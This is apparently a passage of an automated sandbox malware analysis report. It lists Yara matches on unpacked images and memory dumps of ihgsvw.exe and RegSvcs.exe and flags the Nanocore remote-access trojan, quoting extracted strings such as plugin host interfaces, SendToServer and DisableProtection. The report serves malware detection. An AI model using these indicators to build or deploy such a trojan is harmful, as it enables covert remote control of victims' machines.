      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Source: ihgsvw.exeBinary or memory string: WIN_81
      Source: ihgsvw.exeBinary or memory string: WIN_XP
      Source: ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: ihgsvw.exeBinary or memory string: WIN_XPe
      Source: ihgsvw.exeBinary or memory string: WIN_VISTA
      Source: ihgsvw.exeBinary or memory string: WIN_7
      Source: ihgsvw.exeBinary or memory string: WIN_8

      Remote Access Functionality

      barindex
      Detected Nanocore Rat
      Source: ihgsvw.exe, 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: ihgsvw.exe, 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: ihgsvw.exe, 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
